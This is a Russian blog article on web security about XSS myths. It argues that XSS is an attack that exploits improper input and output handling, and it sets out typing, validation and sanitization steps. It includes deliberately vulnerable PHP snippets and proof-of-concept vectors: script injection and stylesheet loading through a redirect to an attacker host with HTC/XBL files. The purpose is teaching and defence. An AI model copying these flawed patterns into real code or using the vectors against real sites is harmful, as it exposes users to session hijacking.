Вся правда об XSS или Почему межсайтовое выполнение сценариев не является уязвимостью?

в 0:31, , рубрики: xss, атаки, безопасность веб-приложений, Веб-разработка, информационная безопасность, уязвимости, метки: , , , ,

Должен признаться, что чтение комментариев на Хабре к практически любым постам, описывающим очередную XSS на каком-либо популярном сервисе или сайте, способно повергнуть в уныние любого, кто так или иначе связан с безопасностью веб-приложений. С учетом распространенных среди разработчиков мифов и заблуждений о межсайтовом выполнении сценариев, нет ничего удивительного в том, что он и по сегодняшний день входит в число наиболее распространенных проблем безопасности веб-приложений: согласно данным отчета Positive Technologies за 2010-2011 годы, XSS были подвержены 40% проанализированных веб-приложений, а из отчета Firehost за второй квартал 2012 года следует, что XSS составила 27% от числа зарегистрированных хостером атак.

И поскольку, заминусовать этот пост можно и за один только его заголовок, то поспешу пояснить: межсайтовое выполнение сценариев действительно не является уязвимостью, но только потому, что оно является атакой. В чем разница, почему это важно, как со всем этим бороться и какие еще мифы и заблуждения распространены об XSS — читаем под катом.

Все заблуждения сформулированы в заголовках, порядок произвольный, любые совпадения примеров конкретных атак и уязвимостей с реально существующими — случайны и непреднамеренны.

XSS — уязвимость

Как уже было сказано выше, это не так. Межсайтовое выполнение сценариев является атакой, причем и по версии OWASP, и по версии WASC (хотя читать мануалыклассификации у нас конечно не принято). Иными словами, XSS является лишь одним из возможных способов эксплуатации уязвимости определенного класса. Например, следующий код содержит только одну уязвимость, но подвержен атакам сразу нескольких классов:

<?php
header( 'Refresh: 5; url=' . $_GET['url']);
?>
<html>
    <head>
        <meta http-equiv="refresh" content="5;url=<?=$_GET['url']?>"></meta>
    </head>
</html>

Во-первых, данный код подвержен атаке злоупотребления функционалом перенаправления, ни имеющей никакого отношения к XSS. Во-вторых, запросом вида http://localhost/?url="><script>alert("XSS")</script><!-- легко и непринужденно реализуется, собственно, межсайтовое выполнение сценариев. В третьих, если веб-приложение будет развернуто в окружении, которое использует канонический PHP версии ниже 4.4.2 или 5.1.2, либо ряд сторонних реализаций PHP, то данный код будет также уязвим и к атакам расщепления и сокрытия HTTP-ответов (а защищенность веб-приложения не должна зависеть от защищенности окружения настолько, насколько это возможно).

Разница между уязвимостью и атакой в том, что устранение уязвимости позволяет избавится и от всех эксплуатирующих ее атак, а вот устранение конкретной атаки — от самой уязвимости не избавляет. Простой пример: если мы, рассматривая данную XSS как уязвимость, устраним ее с помощью URL-кодирования каждого фрагмента переданного скрипту URL'а, то на возможность проведения атаки злоупотребления функционалом перенаправления это совершенно не повлияет — злоумышленник по-прежнему будет иметь возможность перенаправить пользователя на произвольный, корректно сформированный URL. Вместо того, чтобы бороться с причинами, мы должны побороть следствие, а именно — устранить ту самую, единственную уязвимость, которая позволяет проводить все эти атаки. В данном случае, уязвимость заключается в том, что GET-параметр url не обрабатывается должным образом ни при передаче в скрипт веб-сервером, ни перед его использованием в выходных данных. Прошу любить и жаловать: данная уязвимость относится к классам неправильной обработки входных и выходных данных и является самой распространенной уязвимостью, благодаря которой возможно проведение большинства известных на сегодняшний день атак. Следовательно, чтобы устранить эту уязвимость, необходимо обеспечить правильную и достаточную обработку данных обоих типов, при этом очевидно, что в данном случае, URL-кодирование достаточным не является. Мы еще вернемся к этому вопросу чуть позже.

XSS бывает пассивной и активной

«Когда тебе станет совсем скучно — затей с коллегами спор о терминологии» (С). Но тут уже вопрос принципиальный, простите. Я не знаю, благодаря кому именно, русскоговорящим разработчикам была навязана эта гейская классификация (есть мнение, что ее распространению способствовала статья об XSS в русской Википедии), но подобное разделение, хотя и имеет место, тем не менее совершенно бесполезно, т.к. не отражает всех свойств конкретной XSS, реально значимых с точки зрения анализа защищенности веб-приложения и устранения в нем соответствующих уязвимостей. Традиционно и ошибочно принято считать, что XSS может быть пассивной (требующей передать пользователю специально сформированную ссылку и убедить его по ней пройти) и активной (хранящейся на сервере и срабатывающей без лишних телодвижений со стороны пользователя). Однако же, рассмотрим следующий пример: допустим, что в движке Хабра есть уязвимость, позволяющая выйти лишь за рамки атрибута src тега <a> в тексте хабратопика, но не позволяющая выйти за рамки тега. Понятно, что данную уязвимость, можно использовать для проведения атаки XSS, определив обработчик наведения курсора на ссылку, щелчка по ней и т.п. Вопрос: пассивной или активной является такая атака? С одной стороны, ссылка хранится на сервере, ее не нужно доставлять атакуемым пользователям, вроде бы активная. С другой, для успешной атаки необходимы дополнительные действия пользователя, что характерно исключительно для пассивных атак. Парадокс? Именно поэтому, XSS принято классифицировать по двум критериям: вектору и способу воздействия. Второй как раз и является теми самыми «активная/пассивная», однако с более внятными формулировками: активной является XSS не требующая каких-либо лишних действий со стороны пользователя с точки зрения функционала веб-приложения, в отличии от пассивной. А по вектору воздействия, XSS делится на отраженную (возвращаемую сервером в ответ на тот же запрос, в котором был передан вектор эксплуатации), устойчивую (сохраняемую на сервере и доступную во всех ответах на один и тот же запрос, не содержащий вектор эксплуатации) и основанную на объектной модели документа (проведение которой возможно без отправки каких-либо запросов на сервер). Таким образом, правильным ответом на вопрос о классификации приведенного примера атаки является: «устойчивая-пассивная».

XSS — атака на пользователя и направлена на выполнение в его браузере произвольного сценария

Очевидно, что это не совсем так. Для того, чтобы выполнить произвольный сценарий в браузере жертвы, достаточно было бы заманить его на специально подготовленную страницу, размещенную на контролируемом злоумышленником сервере. XSS же направлена не просто на выполнение произвольного сценария, а на его выполнение в контексте источника конкретного сайта с целью обхода политик единого источника (Same Origin Policy, SOP) и, в результате, получения доступа к данным и функционалу клиентской части веб-приложения в рамках пользовательской сессии и с правами ее пользователя. Это атака, в первую очередь, на веб-приложение, реализующая угрозу именно в нем, а не в браузере пользователя.

На конференции PHDays 2012, во время секции "Безопасность Web 2.0. Продвинутые техники" ее ведущий Андерс Рьянчо задал аудитории простой вопрос: «поднимите руки те, кто знает что такое политики единого источника». Как присутствовавший там, готов подтвердить: руки подняло от силы треть аудитории, состоящей целиком и полностью из веб-разработчиков и экспертов по безопасности. На видео этот исторический момент есть, жаль только, что вся аудитория в этот момент не попала в кадр. Честно говоря, я не совсем понимаю, как можно быть разработчиком или экспертом по безопасности веба и не знать об основном механизме защиты современных браузеров, поэтому для себя решил, что народ просто постеснялся поднимать руку перед иностранцем. Однако, даже простой обзор этих политик — задача не на пару абзацев, поэтому всех интересующихся могу направить во вторую часть электронной книги "Browser Security Handbook" Михаля Залевски. Еще глубже эта тема охвачена в "The Tangled Web" того же автора. Обе кстати, рекомендуются к прочтению всеми, кто имеет отношение к веб-разработке или анализу защищенности веб-приложений.

Борьба с XSS — проблема пользователя, да и вообще XSS — это несерьезно

Не совсем понятно, с чего это вдруг атака на веб-приложение (см. выше) стала проблемой пользователя, а не владельца или разработчиков этого приложения. Тут скорее вопрос в том, какова их позиция в вопросах обеспечения защищенной работы пользователей. Риски, связанные с реализацией XSS, действительно зачастую носят репутационный характер. Однако же, если говорить о том, насколько серьезными могут быть последствия успешной XSS в отношении пользователей, рекомендую посмотреть доклад моего коллеги Дениса Баранова «Root через XSS», представленный на конференции ZeroNights 2011 и посвященный получению привилегированного доступа к компьютерам веб-разработчиков через атаку межсайтового выполнения сценариев (к сожалению, доступны только слайды, но общая идея, думаю будет понятна и без видео). Насколько сильным будет ущерб, нанесенный репутации ресурса, если с помощью XSS на его клиентскую часть, атакующие получат неограниченный доступ к компьютерам его пользователей? С учетом того, что средства, превращающие проведение массовой XSS в скрипткиддинг уже давно есть: взять, хотя бы, тот же BeEF. Кроме того, не стоит забывать также и о том, что с точки зрения XSS, администраторы веб-приложений являются точно такими же пользователями, как и все остальные (чьими проблемами якобы и является борьба с этим классом атак, ага).

XSS возможна только в результате инъекции в HTML или клиентский сценарий

Не только. Например, одним из способов применения уже упомянутой атаки расщепления HTTP-ответа, является внедрение HTML-документа (а следовательно и клиентских сценариев, если это необходимо) прямо в HTTP-заголовок, подверженный инъекции. Злоупотребление функционалом перенаправления вполне может быть использовано для редиректа браузера на URL'ы, использующие схему data: или javascript:. Более того, возможно и более неочевидное использование атаки на перенаправление с целью проведения XSS. Допустим, в нашем веб-приложении, помимо точки входа с уже рассмотренной проблемой перенаправления есть также точка со следующим кодом:

<html>
    <head>
        <link rel="stylesheet" href="/themes/<?=$theme?>.css" type="text/css" />
    </head>

При этом, обработка переменной $theme, получаемой из параметров GET-запроса, сводится к удалению из нее всех кавычек, а также обратных слешей и тегов (так, на всякий случай), что делает невозможным для атакующего выбраться за пределы атрибута href. Однако, для проведения XSS этого и не требуется. Используя в качестве параметра $theme значение ../redirect.php?url=http://evilsite.domain/evilstylesheet атакующий получает возможность внедрить в страницу произвольный лист стилей. Используя для IE или FF лист с содержимым

body {
    behavior:url(../redirect.php?url=http://evilsite.domain/evilscript.htc);
}

и

body {
    -moz-binding: url(../redirect.php?url=http://evilsite.domain/evilscript.xml#evilcode);
}

соответственно, и разместив на своем сервере файлы evilscript.htc:

<PUBLIC:COMPONENT TAGNAME="xss">
   <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
   function main() 
   {
     alert("XSS");
   }
</SCRIPT>

и evilscript.xml:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="mycode">
  <implementation>
    <constructor>
      alert("XSS");
    </constructor>
  </implementation>
</binding>

</bindings>

он добивается успешной XSS для пользователей этих двух браузеров. Разумеется, то же самое касается и возможности осуществления инъекции непосредственно в определения стилей.

Большинство векторов XSS, доступных для атакующего в тех или иных браузерах и версиях HTML, перечислено на сайте HTML5 Security Cheatsheet. Там же можно найти и исчерпывающий ответ на вопрос, озвученный в заголовке этого раздела.

В используемом мной фреймворке встроена автоматическая защита от XSS, поэтому мне не нужно заботиться об этом

Действительно, во многих современных фреймворках такая защита реализована. Механизм XSS Filtering в Code Igniter, штатный функционал шаблонизаторов в Django и RoR, Web Protection Library и механизм Request Validation в ASP.NET/MVC и т.д. и т.п. Это безусловно здорово и было бы глупо не использовать этот функционал. Также глупо как и не принимать во внимание, что:

  • ни один серверный фреймворк не способен защитить веб-приложение от DOM-based XSS;
  • ни один из существующих ныне механизмов автоматической защиты от XSS не является универсальным и лишенным тех или иных ограничений, которые необходимо учитывать;
  • функционал, реализуемый этими механизмами, направлен на борьбу с конкретным классом атак и не может защитить от появления в коде уязвимостей недостаточной обработки данных;

Поэтому, заботиться все же нужно, просто в некоторых фреймворках это не будет являться рутиной и требовать существенных временных затрат.

Для устранения XSS достаточно экранировать все строки, попадающие в HTML-документ

Недостаточно, выше уже рассмотрели почему. Устранять нужно не XSS, а обусловившую ее уязвимость, что приводит нас к необходимости обеспечения защищенной обработки данных. Поскольку эта тема тянет на отдельную (и весьма немаленькую) статью, тезисно перечислю основные этапы реализации такой обработки:

Определение степени доверия к данным

В первую очередь, необходимо выявить все потоки данных, целостность или аутентичность которых не контролируется внутри рассматриваемого компонента веб-приложения. Под компонентом веб-приложения, как правило (хотя и не всегда), подразумеваются элементы его серверной или клиентской части, выполняющиеся в рамках одного процесса ОС.

В приведенном выше примере, недоверенными (и единственными) данными является параметр url, получаемый из строки GET-запроса.

Типизация всех недоверенных данных

Как можно ближе к месту появления таких данных в компоненте, необходимо обеспечить их приведение к ожидаемым типам. В статических языках это реализуется, собственно, приведением к типу или созданием экземпляра этого типа на основе десериализации или парсинга проверямых данных. Более того, в большинстве современных фреймворков, построенных на статических языках, этот функционал уже реализован в механизмах биндинга параметров запроса к объектам модели. В динамических языках все несколько грустнее, т.к. по сути там можно говорить только об имитации приведения (которую, тем не менее, необходимо осуществлять). Тем не менее, грамотная реализация даже такой условной типизации даст гарантию, что по нашему компоненту будут гулять данные именно тех типов, на работу с которыми он рассчитан. Вся дальнейшая работа с данными внутри компонента, должна осуществляться только через созданные на основе входных данных объекты. Важно помнить, что основным принципом этапа типизации является как можно меньшее количество объектов строкового типа на его выходе. URL, адреса электропочты, дата, время и т.п. после типизации должны представлять из себя объекты конкретных типов, отличных от строкового. В виде строк должны быть представлены только те данные, которые на самом деле являются строкой, т.е. которые действительно могут содержать произвольный полноалфавитный текст.

В нашем случае, достаточно воспользоваться функцией parse_url() и реализовать проверку появления в элементах полученного массива лишних знаков подчеркивания, означающих наличие в исходном URL запрещенных символов (соответственно, завершать типизацию с ошибкой, если были обнаружены такие символы или если parse_url() и вовсе вернула FALSE). В том случае, если в полученном массиве будет присутствовать ключ query, необходимо также обеспечить его разбор с помощью parse_str() и заменить на получившийся в итоге ассоциативный массив с параметрами запроса.

Валидация всех типизированных недоверенных данных

Сразу после типизации, семантику полученных объектов необходимо проверить на соответствие функционалу компонента. Например, для целочисленных типов или даты/времени — это будет проверка диапазона (едва ли появление в нем, скажем, отрицательных номеров страниц или сумм денежного перевода соответствует ожиданиям функционала), для строковых, в большинстве случаев, будет достаточно проверки на соответствие регулярным выражениям, а для объектов более комплексных типов необходимо реализовывать проверку семантики каждого из его полей и свойств. Любые проверки, связанные с валидацией всегда должны осуществляться на основе принципа белого списка, т.е. семантика данных должна соответствовать разрешенным критериям, а не наоборот. Целью данного этапа является получение гарантии того, что все данные внутри компонента будет соответствовать реализованному в нем функционалу и не смогут его нарушить.

Допустим, что в нашем «веб-приложении» перенаправление может быть осуществлено только в рамках своего домена. В этом случае, нам необходимо убедиться в том, что в массиве, полученном в результате parse_url(), присутствуют только ключи path, query и fragment. Обнаружение любых других ключей должно заканчиваться ошибкой валидации и прекращением обработки запроса за исключением тех случаев, когда scheme, host и port указывают на домен веб-приложения. В более общем случае, будет совсем здорово, если механизм роутинга, используемый в веб-приложении, позволит нам также проверить path на соответствие действительно существующему контроллеру. И уж совсем круто, если то же самое удастся провернуть и с параметрами в query (не говоря уже о fragment).

Санитизация выходных данных

Во всех местах, где валидированные и типизированные нами объекты покидают пределы компонента (либо там, где на их основе формируются выходные данные), необходимо обеспечить их приведение к виду, безопасному для принимающей стороны. Как правило, это достигается путем удаления из них небезопасных элементов (фильтрации) или же их преобразования к безопасным эквивалентам (экранировании). Санитизацию необходимо реализовывать адекватно тому месту, в которое попадут данные в конечном итоге. Так, в случае формирования на их основе HTML-документа, способы правильного экранирования данных, попадающих между тегами, внутрь тегов, внутрь конкретных атрибутов тегов, в текст клиентских сценариев или определений стилей — будут отличаться. Иными словами, htmlspecialchars() не является универсальным средством экранирования, которого всегда и везде будет достаточно.

В нашем случае, достаточно сформировать корректный URL на основе полей полученного на предыдущих этапах объекта, используя функции http_build_query() для построения query-части и url_encode() при формировании элементов пути (либо используя http_build_url() и http_build_str() из pecl_http).

Собственно говоря, эти правила актуальны для любых атак, обусловленных уязвимостью этого класса. Например, для внедрений операторов SQL, команд ОС и т.д. Необходимо также отметить, что хотя большинство разработчиков уже давно в курсе, что данным, которые получает сервер от клиента доверять нельзя, практически никто не задумывается над тем, что обратное также верно, причем по тем же самым причинам. Тем не менее, если бы защищенная обработка данных была реализована и на стороне клиента, это позволило бы свести к минимуму риски клиентских атак, связанные с эксплуатацией уязвимостей на сервере.

Кому-то эти правила могут показаться избыточными и ненужными, однако в реальном (читай: большом и сложном) веб-приложении, любой другой способ избавления от XSS на тему «тут ведь достаточно лишь...» будет являться борьбой с атакой, а не с уязвимостью. С последствиями, которые рано или поздно превратятся в конкретные числа в отчетах ИБ-компаний.

На правах эпилога: выходит, бороться с атаками не нужно?

Еще как нужно. Просто противодействие атакам должно идти в качестве второго эшелона защиты и не должно использоваться в качестве средства устранения уязвимостей. Напоследок, дам еще один совет, как существенно осложнить задачу атакующему на клиентской стороне (не только XSS). Все ответы сервера должны содержать следующие заголовки:

X-Content-Type-Options: nosniff
msdn.microsoft.com/en-us/library/ie/gg622941(v=vs.85).aspx

X-XSS-Protection: 1; mode=block
msdn.microsoft.com/en-us/library/dd565647(v=vs.85).aspx

X-Frame-Options: DENY
blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx

X-Content-Security-Policy: [значение данного заголовка необходимо сформировать исходя из технических требований к функционалу сайта, в соответствии с dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html]

Strict-Transport-Security: max-age=expireTime
developer.mozilla.org/en/Security/HTTP_Strict_Transport_Security

Пояснять назначение каждого, дублируя текст по приведенным ссылкам — думаю, что особого смысла нет.

Удачи!

Автор: VladimirKochetkov

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js